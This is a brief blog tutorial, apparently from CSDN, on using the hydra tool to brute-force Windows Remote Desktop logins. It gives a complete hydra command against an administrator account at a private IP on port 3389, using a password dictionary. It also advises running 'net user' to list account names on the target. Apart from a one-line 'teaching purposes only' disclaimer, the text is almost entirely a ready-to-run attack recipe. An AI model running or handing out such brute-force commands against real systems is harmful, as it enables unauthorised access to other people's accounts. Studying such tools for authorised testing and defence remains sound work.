How to use the hydra tool

hydra parameters:

-l (target user name) 

-P (absolute path to password dictionary)

RDP (Remote Connection Protocol) 192.168.221.104 Target IP address 

3389 (remote connection service port) 

Example:

hydra -l andministrator -P /root/password.txt rdp://192.168.221.104:3389

Get the drone username:

CMD enter net user to get the management user and guest user names. The default is andministrator.

This tutorial is for teaching purposes only. If there are other legal issues, it has nothing to do with me.

Guess you like

Origin blog.csdn.net/m0_63533079/article/details/123237278